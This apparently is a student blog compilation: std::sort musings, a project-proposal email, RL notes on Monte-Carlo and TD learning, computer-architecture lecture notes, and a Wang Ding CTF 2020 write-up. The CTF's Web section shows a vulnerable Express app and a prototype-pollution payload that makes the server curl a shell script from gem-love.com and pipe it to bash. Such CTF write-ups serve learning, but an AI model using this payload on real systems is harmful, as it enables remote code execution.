On std::sort: is the openly visible source the fastest version that actually runs?

https://godbolt.org/z/jxoYx7

We can clearly see that these all compile down to a `call` into the library. The source I have read includes GNU libstdc++'s introsort implementation and an LLVM version with bucket-style sorting, but Linux distros ship prebuilt libraries out of the box, and every company patches its own copies. I got stumped by dhz's question today; my C++ is still not good enough.

zlw once asked me a question: std::sort is very fast, yet you cannot see its source. That does not quite match what I have seen, but I have never debugged glibc or libc++.so, so whether the shipped binaries differ from the public source, who knows?

If glibc could have some odd tricks inserted into it, that would be great.

linux team's motto: make our guest quicker

Parallel Computing Final Project FineTunedHashML Spring 2020

The final repo is stored on GitLab; we added some hash functions to the original algorithm.

Dear Professor,
I’m Yiwei Victor Yang 2018533218 from your parallel computing class.
My teammate and I are struggling to select a project. I proposed porting a CPU LSH deep-learning project, SLIDE (https://github.com/keroro824/HashingDeepLearning/tree/master/SLIDE), a technique recently proposed by Rice University and Intel that uses the AVX-512 instruction set and huge pages to speed up the locality-sensitive hashing that is the main overhead of the project (https://arxiv.org/pdf/1903.03129.pdf).

SLIDE is a project that reimplements backpropagation on the CPU. After the LSH pre-processing, the paper proposes maximum inner product search (MIPS), which mainly performs sparse matrix operations: sparse backpropagation and gradient updates.

After the weight update, stored in CSR format (SpMV), the paper batches the computation with OpenMP.

As the paper reports, the main overhead is the CPU pre-processing; with AVX-512 and huge-pages cache/heap optimization enabled it runs around 30% faster than a raw GPU Tesla V100. If we port that part (dynamic hashing) to the GPU, which the Intel authors say is not applicable, I think there may be a 50 percent chance it ends up faster than the current CPU version.
As one of the paper's references shows, a related method became roughly 2x faster after porting to CUDA, which conflicts with that claim. https://github.com/src-d/minhashcuda

Our proposal is to make a comparison among raw TensorFlow on GPU, SLIDE on AVX-512, and SLIDE on GPU, using the dataset mentioned in the paper.

My question is: do you think porting the dynamic cuckoo hashing in SLIDE to the GPU can achieve a real speedup over the original version? And if we attempt the port but get little speedup, will we still get credit for the project?

Thanks a lot!

[RL] Monte-Carlo Methods

Monte-Carlo RL

  1. MC learns directly from episodes of experience.
  2. MC is model-free: no knowledge of MDP transitions or rewards.
  3. MC learns from complete episodes: no bootstrapping.
    1. Here bootstrapping means using one or more estimated values in the update step for the same kind of estimated value, as in \(SARSA(\lambda)\) or \(Q(\lambda)\).
    2. Single-step TD bootstraps on an estimated value of the next state; n-step and \(\lambda\)-return methods mix results from trajectories of different lengths.
  4. MC uses the simplest possible idea: value = mean return
  5. 2 ways:
    1. model-free: no model necessary and still attains optimality
    2. Simulated: needs only a simulation, not a full model
  6. Caveat: can only apply MC to episodic MDPs
    1. All episodes must terminate

policy evaluation

The goal is to learn \(v_\pi\) from episodes of experience under policy \(\pi\)
\[S_1, A_1, R_2, \ldots, S_k \sim \pi\]
and the return is the total discounted reward: \(G_t = R_{t+1} + \gamma R_{t+2} + \ldots + \gamma^{T-1} R_T\).

The value function is the expected return: \(v_\pi(s) = \mathbb{E}_{\pi}[G_t \mid S_t = s]\).
P.S. Monte-Carlo policy evaluation uses the empirical mean return rather than the expected return.

Depending on which visits within an episode are counted, MC methods divide into every-visit and first-visit; both converge asymptotically.

First-visit

proof of convergence


In fact it updates \(V(s)\) with the running mean \(\frac{S(s)}{N(s)}\).
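A minimal first-visit MC evaluation sketch in Python (sample_episode is a hypothetical helper that plays one episode under the policy and returns a list of (state, reward) pairs):

# First-visit Monte-Carlo policy evaluation (sketch).
# N(s): visit count, S(s): sum of first-visit returns, V(s) = S(s) / N(s).
from collections import defaultdict

def first_visit_mc(policy, sample_episode, num_episodes=1000, gamma=1.0):
    N = defaultdict(int)
    S = defaultdict(float)
    V = defaultdict(float)
    for _ in range(num_episodes):
        episode = sample_episode(policy)        # [(S_t, R_{t+1}), ...]
        G, first_returns = 0.0, {}
        for state, reward in reversed(episode): # accumulate returns backwards
            G = reward + gamma * G
            first_returns[state] = G            # ends up holding the FIRST visit's return
        for state, G in first_returns.items():
            N[state] += 1
            S[state] += G
            V[state] = S[state] / N[state]
    return V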

blackjack (21 points)

In Sutton's book, we get exploration graphs like the following:

Every-Visit Monte-Carlo Policy Evaluation

The difference is that every visit to a state in an episode is counted, not just the first.

Incremental Mean

The means \(\mu_1, \mu_2, \ldots\) of a sequence \(x_1, x_2, \ldots\) can be computed incrementally:
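The standard incremental form (so the mean can be updated online without storing the whole sequence) is

\[\mu_k = \frac{1}{k}\sum_{j=1}^{k} x_j = \mu_{k-1} + \frac{1}{k}\left(x_k - \mu_{k-1}\right)\]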

incremental MC-updates
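Applying the same trick to MC policy evaluation gives, for each visited state \(S_t\) with return \(G_t\) (the standard form, as in Sutton & Barto):

\[N(S_t) \leftarrow N(S_t) + 1\]
\[V(S_t) \leftarrow V(S_t) + \frac{1}{N(S_t)}\left(G_t - V(S_t)\right)\]

or, with a fixed step size for non-stationary problems,

\[V(S_t) \leftarrow V(S_t) + \alpha\left(G_t - V(S_t)\right)\]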

Monte-Carlo Estimation of Action Values

Backup Diagram for Monte-Carlo

Similar to bandits, the aim is to find the optimum under the explore/exploit dilemma, except the entire rest of the episode is included. The only choice considered is the action at each state, and it doesn't bootstrap (unlike DP).

Time required to estimate one state does not depend on the total number of states.

Temporal-Difference Learning

Bootstrapping

The saying: to lift someone up by pulling on their bootstraps again and again, which is impossible.

Modern definition: a resampling technique that draws from the same sample again and again, in the statistical sense.

intro

  1. TD methods learn directly from episodes of experience
  2. TD is model-free: no knowledge of MDP transitions/rewards
  3. TD learns from incomplete episodes, by bootstrapping
  4. TD updates a guess towards a guess

\((n)\): the number represents how many steps the method looks ahead.
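For reference, the one-step TD(0) update (standard form) is

\[V(S_t) \leftarrow V(S_t) + \alpha\left(R_{t+1} + \gamma V(S_{t+1}) - V(S_t)\right)\]

where \(R_{t+1} + \gamma V(S_{t+1})\) is the TD target and \(\delta_t = R_{t+1} + \gamma V(S_{t+1}) - V(S_t)\) is the TD error.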

driving home example

TD is more flexible, because MC has to wait for the final outcome before it can update. Also relevant: on-policy vs. off-policy.




MC makes the prediction closest to the actual observed returns.


We can actually build the estimated MDP and the corresponding value estimates for the AB example.

Comparison

  1. TD can learn before knowing the final outcome
    1. TD can learn online after every step (less memory & peak computation)
    2. MC must wait until end of episode before return is known
  2. TD can learn without the final outcome
    1. TD can learn from incomplete sequences
    2. MC can only learn from complete sequences
    3. TD works in continuing (non-terminating) environments
    4. MC only works for episodic (terminating) environment
      Result: TD performs better on the random-walk example.


batch MC and TD

add step parameter \(\alpha\)

Unified comparison

\(\to\)

  • Bootstrapping: update involves an estimate
    • MC does not bootstrap
    • DP bootstraps
    • TD bootstraps
  • Sampling: the update samples an expectation
    • MC samples
    • DP does not sample
    • TD samples

n-step TD

n-Step Return

Consider the following \(n\)-step returns for \(n = 1, 2, \ldots, \infty\):

\[n=1 \quad (TD) \qquad G_t^{(1)} = R_{t+1} + \gamma V(S_{t+1})\]
\[n=2 \qquad\qquad\ \ \, G_t^{(2)} = R_{t+1} + \gamma R_{t+2} + \gamma^2 V(S_{t+2})\]
\[\vdots\]
\[n=\infty \quad (MC) \qquad G_t^{(\infty)} = R_{t+1} + \gamma R_{t+2} + \ldots + \gamma^{T-1} R_T\]

Define the \(n\)-step return (the general case):

\[G_t^{(n)} = R_{t+1} + \gamma R_{t+2} + \ldots + \gamma^{n-1} R_{t+n} + \gamma^n V(S_{t+n})\]

\(n\)-step temporal-difference learning:

\[V(S_t) \leftarrow V(S_t) + \alpha\left(G_t^{(n)} - V(S_t)\right)\]
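A small Python sketch of the update above (it assumes an episode recorded as parallel lists states and rewards with rewards[t] \(= R_{t+1}\), and a dict V mapping each state to its estimated value):

def n_step_return(states, rewards, t, n, V, gamma=1.0):
    # G_t^(n) = R_{t+1} + ... + gamma^{n-1} R_{t+n} + gamma^n V(S_{t+n})
    T = len(rewards)
    G = 0.0
    for k in range(min(n, T - t)):          # discounted sum of up to n rewards
        G += (gamma ** k) * rewards[t + k]
    if t + n < T:                           # bootstrap only if the episode didn't end
        G += (gamma ** n) * V[states[t + n]]
    return G

def n_step_td_update(states, rewards, t, n, V, alpha=0.1, gamma=1.0):
    G = n_step_return(states, rewards, t, n, V, gamma)
    V[states[t]] += alpha * (G - V[states[t]])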

Reference

  1. What exactly is bootstrapping in reinforcement learning?
  2. First-visit Monte Carlo policy from WSU

Reflection on our 2020 Wang Ding CTF contest

Result

image-20200510230838571

The sunshine will eventually come without doubt tomorrow!

Misc

qiandao

Get the robots.txt from the nginx website and get the destination.

image-20200510231822195

Play the game with gorgeous names in the CTF conf.

image-20200510231813046

Flag in "F12"

image-20200510231804937

Reverse

signal

credit: https://bbs.pediy.com/thread-259429.htm

image-20200510232648046

Not happy: there's a VM inside. From vm_operad, we have

image-20200510232802184

image-20200510232837945

The key is case 7; we can apply the dictionary to a1[v10+1] to figure out what happens. So, fire up OllyDbg.

Applying the table:

int table[] = { 0x0A, 4, 0x10, 3, 5, 1, 4, 0x20, 8, 5, 3, 1, 3, 2, 0x8, 0x0B, 1, 0x0C, 8, 4, 4, 1, 5, 3, 8, 3, 0x21, 1, 0x0B, 8, 0x0B, 1, 4, 9, 8, 3, 0x20, 1, 2, 0x51, 8, 4, 0x24, 1, 0x0C, 8, 0x0B, 1, 5, 2, 8, 2, 0x25, 1, 2, 0x36, 8, 4, 0x41, 1, 2, 0x20, 8, 5, 1, 1, 5, 3, 8, 2, 0x25, 1, 4, 9, 8, 3,0x20, 1, 2, 0x41,8, 0x0C, 1, 7,0x22, 7, 0x3F, 7,0x34, 7, 0x32, 7,0x72, 7, 0x33, 7,0x18, 7, 0xA7, 0xFF, 0xFF, 0xFF, 7,0x31, 7, 0xF1, 0xFF, 0xFF,0xFF, 7, 0x28, 7, 0x84, 0xFF,0xFF, 0xFF, 7, 0xC1, 0xFF, 0xFF, 0xFF, 7,0x1E, 7, 0x7A };

We discover the value of a1[v10+1] stays the same.

We can deduce that case 8 reads the user's input and acts like a vectored handler in an OS.

The handlers can be enumerated as:

10h ^ v8[1]-5 = 22h
(20h ^v8[2])*3=3Fh
v8[3]-2-1=34h
(v8[4]+1 )^4 =32 h
v8[5]*3-21h=72h
v8[6]-1-1=33h
9^v8[7]-20=18
(51h +v8[8])^24h=FA7
v8[9]+1-1=31h
2*v8[10]+25h=F1h
(36h+v8[11]) ^41h =28h
(20h + v8[12])*1=F84h
3*v8[13]+25h=C1h
9^v8[14]-20h=1E h
41h + v8[15] +1 =7A h
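A quick Python sketch (my own reconstruction) that inverts these constraints character by character; the 0xFFFFFF.. values in the table are just the same bytes sign-extended to 32 bits:

# Invert each handler equation to recover v8[1..15].
chars = [
    (0x22 + 5) ^ 0x10,        # 10h ^ v8[1] - 5      = 22h
    (0x3F // 3) ^ 0x20,       # (20h ^ v8[2]) * 3    = 3Fh
    0x34 + 2 + 1,             # v8[3] - 2 - 1        = 34h
    (0x32 ^ 4) - 1,           # (v8[4] + 1) ^ 4      = 32h
    (0x72 + 0x21) // 3,       # v8[5] * 3 - 21h      = 72h
    0x33 + 1 + 1,             # v8[6] - 1 - 1        = 33h
    (0x18 + 0x20) ^ 9,        # 9 ^ v8[7] - 20h      = 18h
    (0xA7 ^ 0x24) - 0x51,     # (51h + v8[8]) ^ 24h  = A7h
    0x31 + 1 - 1,             # v8[9] + 1 - 1        = 31h
    (0xF1 - 0x25) // 2,       # 2 * v8[10] + 25h     = F1h
    (0x28 ^ 0x41) - 0x36,     # (36h + v8[11]) ^ 41h = 28h
    0x84 - 0x20,              # (20h + v8[12]) * 1   = 84h
    (0xC1 - 0x25) // 3,       # 3 * v8[13] + 25h     = C1h
    (0x1E + 0x20) ^ 9,        # 9 ^ v8[14] - 20h     = 1Eh
    0x7A - 0x41 - 1,          # 41h + v8[15] + 1     = 7Ah
]
print("flag{" + "".join(map(chr, chars)) + "}")   # -> flag{757515121f3d478}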

Eventually we get the full flag: flag{757515121f3d478}.

Web

Notes

image-20200510231219939

Get a web shell from the logic in the JS below.

var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');


var app = express();
class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};
    }

    write_note(author, raw_note) {
        this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
    }

    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

    get_all_notes() {
        return this.note_list;
    }

    remove_note(id) {
        delete this.note_list[id];
    }
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));


app.get('/', function(req, res, next) {
  res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
    .get(function(req, res) {
        res.render('mess', {message: 'please use POST to add a note'});
    })
    .post(function(req, res) {
        let author = req.body.author;
        let raw = req.body.raw;
        if (author && raw) {
            notes.write_note(author, raw);
            res.render('mess', {message: "add note sucess"});
        } else {
            res.render('mess', {message: "did not add note"});
        }
    })

app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

app.route('/delete_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to delete a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        if (id) {
            notes.remove_note(id);
            res.render('mess', {message: "delete done"});
        } else {
            res.render('mess', {message: "delete failed"});
        }
    })

app.route('/notes')
    .get(function(req, res) {
        let q = req.query.q;
        let a_note;
        if (typeof(q) === "undefined") {
            a_note = notes.get_all_notes();
        } else {
            a_note = notes.get_note(q);
        }
        res.render('note', {list: a_note});
    })

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })


app.use(function(req, res, next) {
  res.status(404).send('Sorry cant find that!');
});


app.use(function(err, req, res, next) {
  console.error(err.stack);
  res.status(500).send('Something broke!');
});


const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))

Apply the "中国菜刀" (China Chopper)-style payload id=__proto__.abc&author=curl%20http://gem-love.com:12390/shell.txt|bash&raw=a against the undefsafe prototype-pollution bug in /edit_note.
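A sketch of the exploit flow with Python requests (the target URL is hypothetical): /edit_note passes the id into undefsafe as a path, so id=__proto__.abc makes the author string end up on Object.prototype, and the for...in loop in /status later picks up that polluted key and exec()s it.

import requests

TARGET = "http://challenge.example:8080"     # hypothetical address

requests.post(f"{TARGET}/edit_note", data={
    "id": "__proto__.abc",                                       # prototype-pollution path
    "author": "curl http://gem-love.com:12390/shell.txt|bash",   # command to be exec'd
    "raw": "a",
})
requests.get(f"{TARGET}/status")             # for...in over commands now sees the polluted key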

Get the flag from /var/html/code/flag.

flag{8c46c34a-fa1f-4fc9-81bd-609b1aafff8a}

Crypto

boom

image-20200510231932335

just play a simple game

image-20200510231952896

md5:en5oy

image-20200510232016920

stupid z=31,y=68, x=74

image-20200510232038249

stupid Mathematica.

image-20200510232104887

You Raise Me up

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from Crypto.Util.number import *
import random

n = 2 ** 512
m = random.randint(2, n-1) | 1
c = pow(m, bytes_to_long(flag), n)
print 'm = ' + str(m)
print 'c = ' + str(c)

# m = 391190709124527428959489662565274039318305952172936859403855079581402770986890308469084735451207885386318986881041563704825943945069343345307381099559075
# c = 6665851394203214245856789450723658632520816791621796775909766895233000234023642878786025644953797995373211308485605397024123180085924117610802485972584499

What you need to do is solve \(m^f \equiv c \pmod{n}\) for \(f\), i.e. compute a discrete logarithm.

\(n\) is actually \(2^{512}\).

It is just another modular-arithmetic problem like "点鞭炮" (lighting firecrackers), and the technique can be found on Stack Overflow.
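One way to compute the discrete log here (a sketch): for odd \(m\), \(m^{2^k} \equiv 1 \pmod{2^{k+2}}\), so bit \(i\) of \(f\) only affects \(m^f\) modulo \(2^{i+3}\), and \(f\) can be recovered bit by bit. This assumes \(m\) has maximal order, which should hold here since \(m \equiv 3 \pmod 8\):

from Crypto.Util.number import long_to_bytes

def dlog_mod_2k(m, c, bits=512):
    # Solve m^f = c (mod 2^bits) bit by bit; the group order divides 2^(bits-2).
    f = 0
    for i in range(bits - 2):
        mod = 1 << (i + 3)
        if pow(m, f, mod) != c % mod:   # low bits don't match yet,
            f += 1 << i                 # so bit i of f must be 1
    return f

# m, c are the values printed by the challenge script above.
# f = dlog_mod_2k(m, c)
# print(long_to_bytes(f))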

Reflection

We have to practice more and collaborate more!

[RL] RL Category

Following Wikipedia:

Reinforcement Learning is an area of machine learning inspired by behavioral psychology, concerned with how software agents ought to take actions in an environment so as to maximize some notion of cumulative reward.

image-20200412150622271

Behavioral Psychology

Behavior is primarily shaped by reinforcement rather than free-will.

  • behaviors that result in praise/pleasure tend to repeat
  • behaviors that result in punishment/pain tend to become extinct

agent

An entity (learner & decision maker) that is equipped with sensors, end-effectors, and goals.

image-20200412145820170

Action

  • Used by the agent to interact with the environment.
  • May have many different temporal granularities and abstractions

image-20200412145849260

reward

A reward \(R_t\) is a scalar feedback signal.

It indicates how well the agent is doing at step \(t\).

The agent’s job is to maximize cumulative reward

hypothesis: All goals can be described by the maximization of expected cumulative reward

image-20200412150016842

Main Topics of Reinforcement Learning

Learning: by trial and error

Planning: search, reason, thought, cognition

Prediction: evaluation functions, knowledge

Control: action selection, decision making

Dynamics: how the state changes given the actions of the agent

Model-based RL

  • dynamics are known or are estimated
  • solving RL problems that use models and planning

Model-free RL

  • unknown dynamics
  • explicitly trial-and-error learners

not necessarily iid

image-20200412150553154

P.S. There is also inverse reinforcement learning (逆强化学习).

Summary

image-20200412151935910

[Computer Architecture] superscalar

Greater Instruction-Level Parallelism (ILP)

  • Multiple issue “superscalar”
    • Replicate pipeline stages ⇒ multiple pipelines
    • Start multiple instructions per clock cycle – CPI < 1, so use Instructions Per Cycle (IPC)
    • E.g., 4GHz 4-way multiple-issue
      • 16 BIPS, peak CPI = 0.25, peak IPC = 4 (worked out after this list)
    • But dependencies reduce this in practice
  • “Out-of-Order” execution
    • Reorder instructions dynamically in hardware to reduce impact of hazards
  • Hyper-threading
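Working out the multiple-issue example above:

\[\text{peak rate} = 4\ \text{GHz} \times 4\ \tfrac{\text{instructions}}{\text{cycle}} = 16\ \text{billion instructions/s (BIPS)},\qquad \text{peak CPI} = \frac{1}{\text{IPC}} = \frac{1}{4} = 0.25\]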

Pipelining recap

image-20200409104529546

image-20200409104719616

image-20200409104748552

Pipeline complexities explained

GPRs FPRs

  • More than one Functional Unit
  • Floating point execution!
    • Fadd & Fmul: fixed number of cycles; > 1
    • Fdiv: unknown number of cycles!
  • Memory access: on Cache miss unknown number of cycles
  • Issue: Assign instruction to functional unit

image-20200410165203353
image-20200410165333359

summary

image-20200409104937513

Some static multiple issues

VLIW: very long instruction word

image-20200410165502554

The solution can be easily found

image-20200409143437506

image-20200409144123473

Quiz

[ ] A. In-order processors have a CPI >=1

[x] B. more stages allow a higher clock frequency

[x] D. OoO pipelines need speculation

[ ] E. superscalar processor can execute

[Computer Architecture] data path

intro - where are we now?

image-20200331101915459

the cpu

Processor - datapath - control

Scenario in a RISC-V machine

image-20200331102713392

The datapath and control

image-20200331120145444
image-20200331120240686

Overview

  • Problem: a single monolithic block
  • Solution: break up the process of executing an instruction into stages
    • smaller stages are easier to design
    • easy to optimize & adds modularity

five stages

image-20200331102935318

  • Instruction Fetch
    • pc+=4
    • make full use of the memory hierarchy
  • Instruction Decode
  • read the opcode to determine instruction type and field lengths
  • second, (at the same time!) read in data from all necessary registers
    • for add, read two registers
    • for addi, read one register
  • third, generate the immediates
  • ALU
    • the real work of most instructions is done here: arithmetic (+, -, *, /), shifting, logic (&, |)
    • For instance, loads and stores:
      • lw t0, 40(t1)
      • the address we are accessing in memory = the value in t1 PLUS the value 40
      • so we do this addition in this stage
  • Mem access
    • Actually only the load and store instructions do anything during this stage.
    • it's fast but unavoidable
  • Register write
    • write the result of some computation into a register.
    • idle for stores and branches

misc

image-20200331200948199

image-20200331104008311

memory alignment

image-20200331201039177

data path elements state and sequencing

register

image-20200331112454437

instruction level

add

image-20200331105222087image-20200331105422860

image-20200331110018593

time diagram for add

image-20200331111255018

addi

image-20200331120334870

lw

image-20200331202936147

image-20200331203002110

sw - critical path

image-20200331203121826

image-20200331120529637

combined I+S Immediate generation

image-20200331203242961

branches

image-20200331120922178

image-20200331112154728

image-20200331114914251

pipelining

image-20200331120724483

summary

image-20200331180540752

quiz

image-20200331181726584

for D

image-20200331181714589image-20200331181804796image-20200331181819265

for E

image-20200331182129638

CS 150 is composed of Tsinghua's 计算机组成原理 (Computer Organization) and VLSI.


source:http://www-inst.eecs.berkeley.edu/~cs150/sp13/agenda/

image-20200326172234625

They studied verilog

The FSM part is really similar to our homework. Actually, I found that their exam problems were given to us as homework.

P.S.: Why do they get a spring break?

image-20200326172618489

image-20200326172816315

Run Linux on an FPGA and implement a CPU, commonly called "造机" (building your own machine).

If I have time, I'll implement the CPU on my own.

A GPU built on the RISC-V architecture would be even better and cooler.

The more I read and learn, the more I find that knowledge in the EECS category cascades nicely. In most cases, a concept picked up in one place lets us be taught the related one within minutes.

After talking with upperclassman 罗浩聪, I gradually see my career as a PhD in architecture or PL, or something in between. But for now, let me finish the two collaborative papers.

[Computer Architecture] Circuit

intro

image-20200325123544978

synchronous digital systems

Hardware of a processor should be synchronous and digital

The hardware layer of abstraction

image-20200325123706861

switches

image-20200325123737670

The arrow shows the action when the wire changes to 1 (is asserted).

and & or

image-20200325123840940

Transistors

High voltage \(V_{dd}\), low voltage \(Gnd\)

PWD

we implement switches using CMOS

CMOS Transistor Networkimage-20200325124156574

image-20200325124245875vsimage-20200325124301345

note PWD

material:image-20200325124415901

how MOSFET Operation

image-20200325124509056
image-20200325124827736

CMOS Networks

2 input network

image-20200325141011777

combined logic symbols

image-20200325141058284

example debugging waveform

image-20200325140800590
image-20200325140219499

types of circuits

CL (combinational logic)

SL (sequential logic)

image-20200325140345618

example using time chart

image-20200325140122110

[Computer Architecture] call

Language Execution continuum

An interpreter is a program that executes other programs.

  1. Language translation gives us another option.
  2. In general, we translate a high-level language to a lower-level language to increase performance.

image-20200320143508476

interpretation

  1. Python
  2. asm

Assembler directives

image-20200320143656584

pseudo-instruction replacement

image-20200320143736406

What tail calls are about
{...
 lots of code
 return foo(y);
}
  • It's a recursive call to foo() if this is within foo(), or a call to a different function...
  • For efficiency:
    • Evaluate the arguments for foo() in a0-a7
    • Restore ra, all callee-saved registers, and sp
    • Then call foo() with j or tail
  • When foo() returns, it can return directly to where it needs to return to
    • Rather than returning to wherever foo() was called and returning from there
    • This is tail-call optimization

branches

image-20200320144520209

Linking process

image-20200320150133861

image-20200320150156550

Four types of Address

PC-relative addressing (beq)

Absolute addresses in RISC-V

image-20200320150357128

Loading process

image-20200320150929601